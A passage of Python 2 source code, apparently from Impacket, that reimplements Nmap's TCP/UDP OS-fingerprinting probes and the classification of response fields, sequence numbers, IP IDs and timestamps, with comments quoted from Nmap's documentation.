Acknowledgment number is the same as the sequence number in the probe. # S+ Acknowledgment number is the same as the sequence number in the probe plus one. # O Acknowledgment number is something else (other). if self.__tcp.get_th_ack() == self.__sequence + 1: return "S+" elif self.__tcp.get_th_ack() == self.__sequence: return "S" elif self.__tcp.get_th_ack() == 0: return "Z" else: return "O" def get_seq(self): # TCP sequence number (S) # This test examines the 32-bit sequence number field in the TCP # header. Rather than record the field value as some other tests # do, this one examines how it compares to the TCP acknowledgment # number from the probe that elicited the response. # Value Description # Z Sequence number is zero. # A Sequence number is the same as the acknowledgment number in the probe. # A+ Sequence number is the same as the acknowledgment number in the probe plus one. # O Sequence number is something else (other). if self.__tcp.get_th_seq() == self.__acknowledgment + 1: return "A+" elif self.__tcp.get_th_seq() == self.__acknowledgment: return "A" elif self.__tcp.get_th_seq() == 0: return "Z" else: return "O" def get_flags(self): # TCP flags (F) # This field records the TCP flags in the response. Each letter represents # one flag, and they occur in the same order as in a TCP packet (from # high-bit on the left, to the low ones). So the value SA represents the # SYN and ACK bits set, while the value AS is illegal (wrong order). # The possible flags are shown in Table 8.7. # Character Flag name Flag byte value # E ECN Echo (ECE) 64 # U Urgent Data (URG) 32 # A Acknowledgment (ACK) 16 # P Push (PSH) 8 # R Reset (RST) 4 # S Synchronize (SYN) 2 # F Final (FIN) 1 flags = "" if self.__tcp.get_ECE(): flags += "E" if self.__tcp.get_URG(): flags += "U" if self.__tcp.get_ACK(): flags += "A" if self.__tcp.get_PSH(): flags += "P" if self.__tcp.get_RST(): flags += "R" if self.__tcp.get_SYN(): flags += "S" if self.__tcp.get_FIN(): flags += "F" return flags def get_options(self): # Option Name Character Argument (if any) # End of Options List (EOL) L # No operation (NOP) N # Maximum Segment Size (MSS) M The value is appended. Many systems # echo the value used in the corresponding probe. # Window Scale (WS) W The actual value is appended. # Timestamp (TS) T The T is followed by two binary characters # representing the TSval and TSecr values respectively. # The characters are 0 if the field is zero # and 1 otherwise. # Selective ACK permitted (SACK) S options = "" for op in self.__tcp.get_options(): if op.get_kind() == TCPOption.TCPOPT_EOL: options += "L" elif op.get_kind() == TCPOption.TCPOPT_MAXSEG: options += "M%X" % (op.get_mss()) elif op.get_kind() == TCPOption.TCPOPT_NOP: options += "N" elif op.get_kind() == TCPOption.TCPOPT_TIMESTAMP: options += "T%i%i" % (int(op.get_ts()!=0), int(op.get_ts_echo()!=0)) elif op.get_kind() == TCPOption.TCPOPT_WINDOW: options += "W%X" % (op.get_shift_cnt()) elif op.get_kind() == TCPOption.TCPOPT_SACK_PERMITTED: options += "S" return options def get_cc(self): # Explicit congestion notification (CC) # This test is only used for the ECN probe. That probe is a SYN packet # which includes the CWR and ECE congestion control flags. When the # response SYN/ACK is received, those flags are examined to set the # CC (congestion control) test value as described in Table 8.3. # Table 8.3. CC test values # Value Description # Y Only the ECE bit is set (not CWR). This host supports ECN. # N Neither of these two bits is set. The target does not support # ECN. # S Both bits are set. The target does not support ECN, but it # echoes back what it thinks is a reserved bit. # O The one remaining combination of these two bits (other). ece, cwr = self.__tcp.get_ECE(), self.__tcp.get_CWR() if ece and not cwr: return "Y" elif not ece and not cwr: return "N" elif ece and cwr: return "S" else: return "O" def get_quirks(self): # TCP miscellaneous quirks (Q) # This tests for two quirks that a few implementations have in their # TCP stack. The first is that the reserved field in the TCP header # (right after the header length) is nonzero. This is particularly # likely to happen in response to the ECN test as that one sets a # reserved bit in the probe. If this is seen in a packet, an "R" # is recorded in the Q string. # The other quirk Nmap tests for is a nonzero urgent pointer field # value when the URG flag is not set. This is also particularly # likely to be seen in response to the ECN probe, which sets a # non-zero urgent field. A "U" is appended to the Q string when # this is seen. # The Q string must always be generated in alphabetical order. # If no quirks are present, the Q test is empty but still shown. quirks = "" if ((self.__tcp.get_th_flags() >> 8) & 0x0f) != 0: quirks += "R" if self.__tcp.get_URG() == 0 and self.__tcp.get_th_urp() != 0: quirks += "U" return quirks class nmap2_tcp_probe_2_6(nmap2_tcp_probe): sequence = 0x8453 # 0xBASE, obviously mss = 265 # From nmap-4.22SOC8/osscan2.cc: # [...] # "\003\003\012\001\002\004\001\011\010\012\377\377\377\377\000\000\000\000\004\002" # [...] # From: http://nmap.org/book/osdetect-methods.html # [...] # The six T2 through T7 tests each send one TCP probe packet. # With one exception, the TCP options data in each case is (in hex) # 03030A0102040109080AFFFFFFFF000000000402. # Those 20 bytes correspond to window scale (10), NOP, MSS (265), # Timestamp (TSval: 0xFFFFFFFF; TSecr: 0), then SACK permitted. # (... tcp_options = [ TCPOption(TCPOption.TCPOPT_WINDOW, 012), #\003\003\012 TCPOption(TCPOption.TCPOPT_NOP), #\001 TCPOption(TCPOption.TCPOPT_MAXSEG, mss), #\002\004\001\011 TCPOption(TCPOption.TCPOPT_TIMESTAMP, 0xFFFFFFFF), #\010\012\377\377\377\377\000\000\000\000 TCPOption(TCPOption.TCPOPT_SACK_PERMITTED) #\004\002 ] def __init__(self, id, addresses, tcp_ports, open_port): nmap2_tcp_probe.__init__(self, id, addresses, tcp_ports, open_port, self.sequence, self.tcp_options) class nmap2_tcp_probe_7(nmap2_tcp_probe): sequence = 0x8453 # 0xBASE, obviously mss = 265 # ...) # The exception is that T7 uses a Window scale value of 15 rather than 10 # [...] tcp_options = [ TCPOption(TCPOption.TCPOPT_WINDOW, 017), #\003\003\017 TCPOption(TCPOption.TCPOPT_NOP), #\001 TCPOption(TCPOption.TCPOPT_MAXSEG, mss), #\002\004\001\011 TCPOption(TCPOption.TCPOPT_TIMESTAMP, 0xFFFFFFFF), #\010\012\377\377\377\377\000\000\000\000 TCPOption(TCPOption.TCPOPT_SACK_PERMITTED) #\004\002 ] def __init__(self, id, addresses, tcp_ports, open_port): nmap2_tcp_probe.__init__(self, id, addresses, tcp_ports, open_port, self.sequence, self.tcp_options) class nmap_port_unreachable(udp_closed_probe): def __init__(self, id, addresses, ports): udp_closed_probe.__init__(self, id, addresses, ports[2]) self.set_resp(False) def test_id(self): pass def set_resp(self, resp): pass def process(self, packet): pass class nmap1_port_unreachable(nmap_port_unreachable): def __init__(self, id, addresses, ports): nmap_port_unreachable.__init__(self, id, addresses, ports) self.u.contains(Data("A" * 300)) def test_id(self): return "PU" def set_resp(self,resp): if resp: self.add_result("Resp", "Y") else: self.add_result("Resp", "N") def process(self, packet): ip_orig = self.err_data if ip_orig.get_ip_p() != ImpactPacket.UDP.protocol: return udp = ip_orig.child() if not udp: return ip = packet.child() self.set_resp(True) if ip.get_ip_df(): self.add_result("DF", "Y") else: self.add_result("DF", "N") self.add_result("TOS", ip.get_ip_tos()) self.add_result("IPLEN", ip.get_ip_len()) self.add_result("RIPTL", ip_orig.get_ip_len()) # Some systems return a different IPLEN recv_ip_id = ip_orig.get_ip_id() if 0 == recv_ip_id: self.add_result("RID", "0") elif udp_closed_probe.ip_id == recv_ip_id: self.add_result("RID", "E") else: self.add_result("RID", "F") ip_sum = ip_orig.get_ip_sum() ip_orig.set_ip_sum(0) checksum = ip_orig.compute_checksum(ip_orig.get_bytes()) if 0 == checksum: self.add_result("RIPCK", "0") elif checksum == ip_sum: self.add_result("RIPCK", "E") else: self.add_result("RIPCK", "F") udp_sum = udp.get_uh_sum() udp.set_uh_sum(0) udp.auto_checksum = 1 udp.calculate_checksum() if 0 == udp_sum: self.add_result("UCK", "0") elif self.u.get_uh_sum() == udp_sum: self.add_result("UCK", "E") else: self.add_result("UCK", "F") self.add_result("ULEN", udp.get_uh_ulen()) if ip.child().child().child().child() == udp.child(): # Some systems meddle with the data self.add_result("DAT", "E") else: self.add_result("DAT", "F") def get_final_result(self): return {self.test_id(): self.get_result_dict()} class nmap2_port_unreachable(nmap_port_unreachable): # UDP (U1) # This probe is a UDP packet sent to a closed port. The character 'C' # (0x43) is repeated 300 times for the data field. The IP ID value is # set to 0x1042 for operating systems which allow us to set this. If # the port is truly closed and there is no firewall in place, Nmap # expects to receive an ICMP port unreachable message in return. # That response is then subjected to the R, DF, T, TG, TOS, IPL, UN, # RIPL, RID, RIPCK, RUCK, RUL, and RUD tests. def __init__(self, id, addresses, ports): nmap_port_unreachable.__init__(self, id, addresses, ports) self.u.contains(Data("C" * 300)) self.i.set_ip_id(0x1042) def test_id(self): return "U1" def set_resp(self,resp): if resp: self.add_result("R", "Y") else: self.add_result("R", "N") def process(self, packet): ip_orig = self.err_data if ip_orig.get_ip_p() != ImpactPacket.UDP.protocol: return udp = ip_orig.child() if not udp: return ip = packet.child() icmp = ip.child() if ip.get_ip_df(): self.add_result("DF", "Y") else: self.add_result("DF", "N") # XXX T # IP initial time-to-live (T) # IP packets contain a field named time-to-live (TTL) which is # decremented every time they traverse a router. If the field # reaches zero, the packet must be discarded. This prevents # packets from looping endlessly. Because operating systems differ # on which TTL they start with, it can be used for OS detection. # Nmap determines how many hops away it is from the target by # examining the ICMP port unreachable response to the U1 probe. # That response includes the original IP packet, including the # already-decremented TTL field, received by the target. By # subtracting that value from our as-sent TTL, we learn how many # hops away the machine is. Nmap then adds that hop distance to # the probe response TTL to determine what the initial TTL was # when that ICMP probe response packet was sent. That initial TTL # value is stored in the fingerprint as the T result. # Even though an eight-bit field like TTL can never hold values # greater than 0xFF, this test occasionally results in values of # 0x100 or higher. This occurs when a system (could be the source, # a target, or a system in between) corrupts or otherwise fails to # correctly decrement the TTL. It can also occur due to asymmetric # routes. # XXX TG # IP initial time-to-live guess (TG) # It is not uncommon for Nmap to receive no response to the U1 probe, # which prevents Nmap from learning how many hops away a target is. # Firewalls and NAT devices love to block unsolicited UDP packets. # But since common TTL values are spread well apart and targets are # rarely more than 20 hops away, Nmap can make a pretty good guess # anyway. Most systems send packets with an initial TTL of 32, 60, 64, # 128, or 255. So the TTL value received in the response is rounded # up to the next value out of 32, 64, 128, or 255. 60 is not in that # list because it cannot be reliably distinguished from 64. It is # rarely seen anyway. # The resulting guess is stored in the TG field. This TTL guess field # is not printed in a subject fingerprint if the actual TTL (T) value # was discovered. # IP type of service (TOS) # This test simply records the type of service byte from the # IP header of ICMP port unreachable packets. # This byte is described in RFC 791 self.add_result("TOS", "%X" % ip.get_ip_tos()) # IP total length (IPL) # This test records the total length (in octets) of an IP packet. # It is only used for the port unreachable response elicited by the # U1 test. self.add_result("IPL", "%X" % ip.get_ip_len()) # Unused port unreachable field nonzero (UN) # An ICMP port unreachable message header is eight bytes long, but # only the first four are used. RFC 792 states that the last four # bytes must be zero. A few implementations (mostly ethernet switches # and some specialized embedded devices) set it anyway. The value of # those last four bytes is recorded in this field. self.add_result("UN", "%X" % icmp.get_icmp_void()) # Returned probe IP total length value (RIPL) # ICMP port unreachable messages (as are sent in response to the U1 # probe) are required to include the IP header which generated them. # This header should be returned just as they received it, but some # implementations send back a corrupted version due to changes they # made during IP processing. This test simply records the returned # IP total length value. If the correct value of 0x148 (328) is # returned, the value G (for good) is stored instead of the actual value. if ip_orig.get_ip_len() == 0x148: self.add_result("RIPL","G") else: self.add_result("RIPL", "%X" % ip_orig.get_ip_len()) # Returned probe IP ID value (RID) # The U1 probe has a static IP ID value of 0x1042. If that value is # returned in the port unreachable message, the value G is stored for # this test. Otherwise the exact value returned is stored. Some systems, # such as Solaris, manipulate IP ID values for raw IP packets that # Nmap sends. In such cases, this test is skipped. We have found # that some systems, particularly HP and Xerox printers, flip the bytes # and return 0x4210 instead. if 0x1042 == ip_orig.get_ip_id(): self.add_result("RID", "G") else: self.add_result("RID", "%X" % ip_orig.get_ip_id()) # Integrity of returned probe IP checksum value (RIPCK) # The IP checksum is one value that we don't expect to remain the same # when returned in a port unreachable message. After all, each network # hop during transit changes the checksum as the TTL is decremented. # However, the checksum we receive should match the enclosing IP packet. # If it does, the value G (good) is stored for this test. If the returned # value is zero, then Z is stored. Otherwise the result is I (invalid). ip_sum = ip_orig.get_ip_sum() ip_orig.set_ip_sum(0) checksum = ip_orig.compute_checksum(ip_orig.get_bytes()) if 0 == checksum: self.add_result("RIPCK", "Z") elif checksum == ip_sum: self.add_result("RIPCK", "G") else: self.add_result("RIPCK", "I") # Integrity of returned probe UDP length and checksum (RUL and RUCK) # The UDP header length and checksum values should be returned exactly # as they were sent. If so, G is recorded for these tests. Otherwise # the value actually returned is recorded. The proper length is 0x134 (308). udp_sum = udp.get_uh_sum() udp.set_uh_sum(0) udp.auto_checksum = 1 udp.calculate_checksum() if self.u.get_uh_sum() == udp_sum: self.add_result("RUCK", "G") else: self.add_result("RUCK", "%X" % udp_sum) if udp.get_uh_ulen() == 0x134: self.add_result("RUL","G") else: self.add_result("RUL", "%X" % udp.get_uh_ulen()) # Integrity of returned UDP data (RUD) # If the UDP payload returned consists of 300 'C' (0x43) # characters as expected, a G is recorded for this test. # Otherwise I (invalid) is recorded. if ip.child().child().child().child() == udp.child(): self.add_result("RUD", "G") else: self.add_result("RUD", "I") def get_final_result(self): return {self.test_id(): self.get_result_dict()} class OS_ID: def __init__(self, target, ports): pcap_dev = pcap.lookupdev() self.p = pcap.open_live(pcap_dev, 600, 0, 3000) self.__source = self.p.getlocalip() self.__target = target self.p.setfilter("src host %s and dst host %s" % (target, self.__source), 1, 0xFFFFFF00) self.p.setmintocopy(10) self.decoder = EthDecoder() self.tests_sent = [] self.outstanding_count = 0 self.results = {} self.current_id = 12345 self.__ports = ports def releasePcap(self): if not (self.p is None): self.p.close() def get_new_id(self): id = self.current_id self.current_id += 1 self.current_id &= 0xFFFF return id def send_tests(self, tests): self.outstanding_count = 0 for t_class in tests: # Ok, I need to know if the constructor accepts the parameter port # We could ask also by co_varnames, but the port parameters is not a standarized... asking by args count :( if t_class.__init__.im_func.func_code.co_argcount == 4: test = t_class(self.get_new_id(), [self.__source, self.__target], self.__ports ) else: test = t_class(self.get_new_id(), [self.__source, self.__target] ) self.p.sendpacket(test.get_test_packet()) self.outstanding_count += 1 self.tests_sent.append(test) while self.p.readready(): self.p.dispatch(1, self.packet_handler) while self.outstanding_count > 0: data = self.p.next()[0] if data: self.packet_handler(0, data) else: break def run(self): pass def get_source(self): return self.__source def get_target(self): return self.__target def get_ports(self): return self.__ports def packet_handler(self, len, data): packet = self.decoder.decode(data) for t in self.tests_sent: if t.is_mine(packet): t.process(packet) self.outstanding_count -= 1 class nmap1_tcp_open_1(nmap1_tcp_probe): def __init__(self, id, addresses, tcp_ports): nmap1_tcp_probe.__init__(self, id, addresses, tcp_ports, 1) self.t.set_ECE() self.t.set_SYN() def test_id(self): return "T1" def is_mine(self, packet): if tcp_probe.is_mine(self, packet): ip = packet.child() if not ip: return 0 tcp = ip.child() if not tcp: return 0 if tcp.get_SYN() and tcp.get_ACK(): return 1 else: return 0 else: return 0 class nmap1_tcp_open_2(nmap1_tcp_probe): def __init__(self, id, addresses, tcp_ports): nmap1_tcp_probe.__init__(self, id, addresses, tcp_ports, 1) def test_id(self): return "T2" class nmap2_tcp_open_2(nmap2_tcp_probe_2_6): # From: http://nmap.org/book/osdetect-methods.html # [...] # T2 sends a TCP null (no flags set) packet with the IP DF bit set and a # window field of 128 to an open port. # ... def __init__(self, id, addresses, tcp_ports): nmap2_tcp_probe_2_6.__init__(self, id, addresses, tcp_ports, 1) self.i.set_ip_df(1) self.t.set_th_win(128) def test_id(self): return "T2" class nmap1_tcp_open_3(nmap1_tcp_probe): def __init__(self, id, addresses, tcp_ports ): nmap1_tcp_probe.__init__(self, id, addresses, tcp_ports, 1) self.t.set_SYN() self.t.set_FIN() self.t.set_URG() self.t.set_PSH() def test_id(self): return "T3" class nmap2_tcp_open_3(nmap2_tcp_probe_2_6): # ... # T3 sends a TCP packet with the SYN, FIN, URG, and PSH flags set and a # window field of 256 to an open port. The IP DF bit is not set. # ... def __init__(self, id, addresses, tcp_ports ): nmap2_tcp_probe_2_6.__init__(self, id, addresses, tcp_ports, 1) self.t.set_SYN() self.t.set_FIN() self.t.set_URG() self.t.set_PSH() self.t.set_th_win(256) self.i.set_ip_df(0) def test_id(self): return "T3" class nmap1_tcp_open_4(nmap1_tcp_probe): def __init__(self, id, addresses, tcp_ports): nmap1_tcp_probe.__init__(self, id, addresses, tcp_ports, 1) self.t.set_ACK() def test_id(self): return "T4" class nmap2_tcp_open_4(nmap2_tcp_probe_2_6): # ... # T4 sends a TCP ACK packet with IP DF and a window field of 1024 to # an open port. # ... def __init__(self, id, addresses, tcp_ports ): nmap2_tcp_probe_2_6.__init__(self, id, addresses, tcp_ports, 1) self.t.set_ACK() self.i.set_ip_df(1) self.t.set_th_win(1024) def test_id(self): return "T4" class nmap1_seq(nmap1_tcp_probe): SEQ_UNKNOWN = 0 SEQ_64K = 1 SEQ_TD = 2 SEQ_RI = 4 SEQ_TR = 8 SEQ_i800 = 16 SEQ_CONSTANT = 32 TS_SEQ_UNKNOWN = 0 TS_SEQ_ZERO = 1 # At least one of the timestamps we received back was 0 TS_SEQ_2HZ = 2 TS_SEQ_100HZ = 3 TS_SEQ_1000HZ = 4 TS_SEQ_UNSUPPORTED = 5 # System didn't send back a timestamp IPID_SEQ_UNKNOWN = 0 IPID_SEQ_INCR = 1 # simple increment by one each time IPID_SEQ_BROKEN_INCR = 2 # Stupid MS -- forgot htons() so it counts by 256 on little-endian platforms IPID_SEQ_RPI = 3 # Goes up each time but by a "random" positive increment IPID_SEQ_RD = 4 # Appears to select IPID using a "random" distributions (meaning it can go up or down) IPID_SEQ_CONSTANT = 5 # Contains 1 or more sequential duplicates IPID_SEQ_ZERO = 6 # Every packet that comes back has an IP.ID of 0 (eg Linux 2.4 does this) def __init__(self, id, addresses, tcp_ports): nmap1_tcp_probe.__init__(self, id, addresses, tcp_ports, 1) self.t.set_SYN() self.t.set_th_seq(id) # Used to match results with sent packets. def process(self, p): raise Exception("Method process is meaningless for class %s." % self.__class__.__name__) class nmap2_seq(nmap2_tcp_probe): TS_SEQ_UNKNOWN = 0 TS_SEQ_ZERO = 1 # At least one of the timestamps we received back was 0 TS_SEQ_UNSUPPORTED = 5 # System didn't send back a timestamp IPID_SEQ_UNKNOWN = 0 IPID_SEQ_INCR = 1 # simple increment by one each time IPID_SEQ_BROKEN_INCR = 2 # Stupid MS -- forgot htons() so it counts by 256 on little-endian platforms IPID_SEQ_RPI = 3 # Goes up each time but by a "random" positive increment IPID_SEQ_RD = 4 # Appears to select IPID using a "random" distributions (meaning it can go up or down) IPID_SEQ_CONSTANT = 5 # Contains 1 or more sequential duplicates IPID_SEQ_ZERO = 6 # Every packet that comes back has an IP.ID of 0 (eg Linux 2.4 does this) def __init__(self, id, addresses, tcp_ports, options): nmap2_tcp_probe.__init__(self, id, addresses, tcp_ports, 1, id, options) self.t.set_SYN() def process(self, p): raise Exception("Method process is meaningless for class %s." % self.__class__.__name__) class nmap2_seq_1(nmap2_seq): # Packet #1: window scale (10), # NOP, # MSS (1460), # timestamp (TSval: 0xFFFFFFFF; TSecr: 0), # SACK permitted. # The window field is 1. tcp_options = [ TCPOption(TCPOption.TCPOPT_WINDOW, 10), TCPOption(TCPOption.TCPOPT_NOP), TCPOption(TCPOption.TCPOPT_MAXSEG, 1460), TCPOption(TCPOption.TCPOPT_TIMESTAMP, 0xFFFFFFFF), TCPOption(TCPOption.TCPOPT_SACK_PERMITTED) ] def __init__(self, id, addresses, tcp_ports): nmap2_seq.__init__(self, id, addresses, tcp_ports, self.tcp_options) self.t.set_th_win(1) class nmap2_seq_2(nmap2_seq): # Packet #2: MSS (1400), # window scale (0), # SACK permitted, # timestamp (TSval: 0xFFFFFFFF; TSecr: 0), # EOL. # The window field is 63. tcp_options = [ TCPOption(TCPOption.TCPOPT_MAXSEG, 1400), TCPOption(TCPOption.TCPOPT_WINDOW, 0), TCPOption(TCPOption.TCPOPT_SACK_PERMITTED), TCPOption(TCPOption.TCPOPT_TIMESTAMP, 0xFFFFFFFF), TCPOption(TCPOption.TCPOPT_EOL) ] def __init__(self, id, addresses, tcp_ports): nmap2_seq.__init__(self, id, addresses, tcp_ports, self.tcp_options) self.t.set_th_win(63) class nmap2_seq_3(nmap2_seq): # Packet #3: Timestamp (TSval: 0xFFFFFFFF; TSecr: 0), # NOP, # NOP, # window scale (5), # NOP, # MSS (640). # The window field is 4. tcp_options = [ TCPOption(TCPOption.TCPOPT_TIMESTAMP, 0xFFFFFFFF), TCPOption(TCPOption.TCPOPT_NOP), TCPOption(TCPOption.TCPOPT_NOP), TCPOption(TCPOption.TCPOPT_WINDOW, 5), TCPOption(TCPOption.TCPOPT_NOP), TCPOption(TCPOption.TCPOPT_MAXSEG, 640) ] def __init__(self, id, addresses, tcp_ports): nmap2_seq.__init__(self, id, addresses, tcp_ports, self.tcp_options) self.t.set_th_win(4) class nmap2_seq_4(nmap2_seq): # Packet #4: SACK permitted, # Timestamp (TSval: 0xFFFFFFFF; TSecr: 0), # window scale (10), # EOL. # The window field is 4. tcp_options = [ TCPOption(TCPOption.TCPOPT_SACK_PERMITTED), TCPOption(TCPOption.TCPOPT_TIMESTAMP, 0xFFFFFFFF), TCPOption(TCPOption.TCPOPT_WINDOW, 10), TCPOption(TCPOption.TCPOPT_EOL) ] def __init__(self, id, addresses, tcp_ports): nmap2_seq.__init__(self, id, addresses, tcp_ports, self.tcp_options) self.t.set_th_win(4) class nmap2_seq_5(nmap2_seq): # Packet #5: MSS (536), # SACK permitted, # Timestamp (TSval: 0xFFFFFFFF; TSecr: 0), # window scale (10), # EOL. # The window field is 16. tcp_options = [ TCPOption(TCPOption.TCPOPT_MAXSEG, 536), TCPOption(TCPOption.TCPOPT_SACK_PERMITTED), TCPOption(TCPOption.TCPOPT_TIMESTAMP, 0xFFFFFFFF), TCPOption(TCPOption.TCPOPT_WINDOW, 10), TCPOption(TCPOption.TCPOPT_EOL) ] def __init__(self, id, addresses, tcp_ports): nmap2_seq.__init__(self, id, addresses, tcp_ports, self.tcp_options) self.t.set_th_win(16) class nmap2_seq_6(nmap2_seq): # Packet #6: MSS (265), # SACK permitted, # Timestamp (TSval: 0xFFFFFFFF; TSecr: 0). # The window field is 512. tcp_options = [ TCPOption(TCPOption.TCPOPT_MAXSEG, 265), TCPOption(TCPOption.TCPOPT_SACK_PERMITTED), TCPOption(TCPOption.TCPOPT_TIMESTAMP, 0xFFFFFFFF) ] def __init__(self, id, addresses, tcp_ports): nmap2_seq.__init__(self, id, addresses, tcp_ports, self.tcp_options) self.t.set_th_win(512) class nmap1_seq_container(os_id_test): def __init__(self, num_seq_samples, responses, seq_diffs, ts_diffs, time_diffs): os_id_test.__init__(self, 0) self.num_seq_samples = num_seq_samples self.seq_responses = responses self.seq_num_responses = len(responses) self.seq_diffs = seq_diffs self.ts_diffs = ts_diffs self.time_diffs = time_diffs self.pre_ts_seqclass = nmap1_seq.TS_SEQ_UNKNOWN def test_id(self): return "TSEQ" def set_ts_seqclass(self, ts_seqclass): self.pre_ts_seqclass = ts_seqclass def process(self): ipid_seqclass = self.ipid_sequence() if nmap1_seq.TS_SEQ_UNKNOWN != self.pre_ts_seqclass: ts_seqclass = self.pre_ts_seqclass else: ts_seqclass = self.ts_sequence() if self.seq_num_responses >= 4: seq_seqclass = self.seq_sequence() if nmap1_seq.SEQ_UNKNOWN != seq_seqclass: self.add_seqclass(seq_seqclass) if nmap1_seq.IPID_SEQ_UNKNOWN != ipid_seqclass: self.add_ipidclass(ipid_seqclass) if nmap1_seq.TS_SEQ_UNKNOWN != ts_seqclass: self.add_tsclass(ts_seqclass) else: PyImpact.t_log(1, "Insufficient responses for TCP sequencing (%d out of %d), OS detection may be less accurate." % (self.seq_num_responses, self.num_seq_samples)) def get_final_result(self): "Returns a string representation of the final result of this test or None if no response was received" return {self.test_id(): self.get_result_dict()} def ipid_sequence(self): if self.seq_num_responses < 2: return nmap1_seq.IPID_SEQ_UNKNOWN ipid_diffs = array.array('H', [0] * (self.seq_num_responses - 1)) null_ipids = 1 for i in xrange(1, self.seq_num_responses): prev_ipid = self.seq_responses[i-1].get_ipid() cur_ipid = self.seq_responses[i].get_ipid() if cur_ipid < prev_ipid and (cur_ipid > 500 or prev_ipid < 65000): return nmap1_seq.IPID_SEQ_RD if prev_ipid != 0 or cur_ipid != 0: null_ipids = 0 ipid_diffs[i-1] = abs(cur_ipid - prev_ipid) if null_ipids: return nmap1_seq.IPID_SEQ_ZERO # Battle plan: # If any diff is > 1000, set to random, if 0, set to constant. # If any of the diffs are 1, or all are less than 9, set to incremental. for i in xrange(0, self.seq_num_responses - 1): if ipid_diffs[i] > 1000: return nmap1_seq.IPID_SEQ_RPI if ipid_diffs[i] == 0: return nmap1_seq.IPID_SEQ_CONSTANT is_incremental = 1 # All diferences are less than 9 is_ms = 1 # All diferences are multiples of 256 for i in xrange(0, self.seq_num_responses - 1): if ipid_diffs[i] == 1: return nmap1_seq.IPID_SEQ_INCR if is_ms and ipid_diffs[i] < 2560 and (ipid_diffs[i] % 256) != 0: is_ms = 0 if ipid_diffs[i] > 9: is_incremental = 0 if is_ms: return nmap1_seq.IPID_SEQ_BROKEN_INCR if is_incremental: return nmap1_seq.IPID_SEQ_INCR return nmap1_seq.IPID_SEQ_UNKNOWN def ts_sequence(self): if self.seq_num_responses < 2: return nmap1_seq.TS_SEQ_UNKNOWN # Battle plan: # 1) Compute average increments per second, and variance in incr. per second. # 2) If any are 0, set to constant. # 3) If variance is high, set to random incr. [ skip for now ] # 4) if ~10/second, set to appropriate thing. # 5) Same with ~100/s. avg_freq = 0.0 for i in xrange(0, self.seq_num_responses - 1): dhz = self.ts_diffs[i] / self.time_diffs[i] avg_freq += dhz / (self.seq_num_responses - 1) PyImpact.t_log(2, "The avg TCP TS HZ is: %f" % avg_freq) if 0 < avg_freq and avg_freq < 3.9: return nmap1_seq.TS_SEQ_2HZ if 85 < avg_freq and avg_freq < 115: return nmap1_seq.TS_SEQ_100HZ if 900 < avg_freq and avg_freq < 1100: return nmap1_seq.TS_SEQ_1000HZ return nmap1_seq.TS_SEQ_UNKNOWN def seq_sequence(self): self.seq_gcd = reduce(my_gcd, self.seq_diffs) avg_incr = 0 seqclass = nmap1_seq.SEQ_UNKNOWN if 0 != self.seq_gcd: map(lambda x, gcd = self.seq_gcd: x / gcd, self.seq_diffs) for i in xrange(0, self.seq_num_responses - 1): if abs(self.seq_responses[i+1].get_seq() - self.seq_responses[i].get_seq()) > 50000000: seqclass = nmap1_seq.SEQ_TR; self.index = 9999999 break avg_incr += self.seq_diffs[i] if 0 == self.seq_gcd: seqclass = nmap1_seq.SEQ_CONSTANT self.index = 0 elif 0 == self.seq_gcd % 64000: seqclass = nmap1_seq.SEQ_64K self.index = 1 elif 0 == self.seq_gcd % 800: seqclass = nmap1_seq.SEQ_i800 self.index = 10 elif nmap1_seq.SEQ_UNKNOWN == seqclass: avg_incr = int(.5 + avg_incr / (self.seq_num_responses - 1)) sum_incr = 0.0 for i in range(0, self.seq_num_responses - 1): d = abs(self.seq_diffs[i] - avg_incr) sum_incr += float(d * d) sum_incr /= self.seq_num_responses - 1 self.index = int(.5 + math.sqrt(sum_incr)) if self.index < 75: seqclass = nmap1_seq.SEQ_TD else: seqclass = nmap1_seq.SEQ_RI return seqclass seqclasses = { nmap1_seq.SEQ_64K: '64K', nmap1_seq.SEQ_TD: 'TD', nmap1_seq.SEQ_RI: 'RI', nmap1_seq.SEQ_TR: 'TR', nmap1_seq.SEQ_i800: 'i800', nmap1_seq.SEQ_CONSTANT: 'C', } def add_seqclass(self, id): self.add_result('CLASS', nmap1_seq_container.seqclasses[id]) if nmap1_seq.SEQ_CONSTANT == id: self.add_result('VAL', '%i' % self.seq_responses[0].get_seq()) elif id in (nmap1_seq.SEQ_TD, nmap1_seq.SEQ_RI): self.add_result('GCD', '%i' % self.seq_gcd) self.add_result('SI', '%i' % self.index) tsclasses = { nmap1_seq.TS_SEQ_ZERO: '0', nmap1_seq.TS_SEQ_2HZ: '2HZ', nmap1_seq.TS_SEQ_100HZ: '100HZ', nmap1_seq.TS_SEQ_1000HZ: '1000HZ', nmap1_seq.TS_SEQ_UNSUPPORTED: 'U', } def add_tsclass(self, id): self.add_result('TS', nmap1_seq_container.tsclasses[id]) ipidclasses = { nmap1_seq.IPID_SEQ_INCR: 'I', nmap1_seq.IPID_SEQ_BROKEN_INCR: 'BI', nmap1_seq.IPID_SEQ_RPI: 'RPI', nmap1_seq.IPID_SEQ_RD: 'RD', nmap1_seq.IPID_SEQ_CONSTANT: 'C', nmap1_seq.IPID_SEQ_ZERO: 'Z', } def add_ipidclass(self, id): self.add_result('IPID', nmap1_seq_container.ipidclasses[id]) class nmap2_seq_container(os_id_test): def __init__(self, num_seq_samples, responses, seq_diffs, ts_diffs, time_diffs): os_id_test.__init__(self, 0) self.num_seq_samples = num_seq_samples self.seq_responses = responses self.seq_num_responses = len(responses) self.seq_diffs = seq_diffs self.ts_diffs = ts_diffs self.time_diffs = time_diffs self.pre_ts_seqclass = nmap2_seq.TS_SEQ_UNKNOWN def test_id(self): return "SEQ" def set_ts_seqclass(self, ts_seqclass): self.pre_ts_seqclass = ts_seqclass def process(self): if self.seq_num_responses >= 4: self.calc_ti() self.calc_ts() self.calc_sp() else: self.add_result('R', 'N') PyImpact.t_log(1, "Insufficient responses for TCP sequencing (%d out of %d), OS detection may be less accurate." % (self.seq_num_responses, self.num_seq_samples)) def get_final_result(self): return {self.test_id(): self.get_result_dict()} def calc_ti(self): if self.seq_num_responses < 2: return ipidclasses = { nmap2_seq.IPID_SEQ_INCR: 'I', nmap2_seq.IPID_SEQ_BROKEN_INCR: 'BI', nmap2_seq.IPID_SEQ_RPI: 'RI', nmap2_seq.IPID_SEQ_RD: 'RD', nmap2_seq.IPID_SEQ_CONSTANT: 'C', nmap2_seq.IPID_SEQ_ZERO: 'Z', } ipid_diffs = array.array('H', [0] * (self.seq_num_responses - 1)) # Random and zero null_ipids = 1 for i in xrange(1, self.seq_num_responses): prev_ipid = 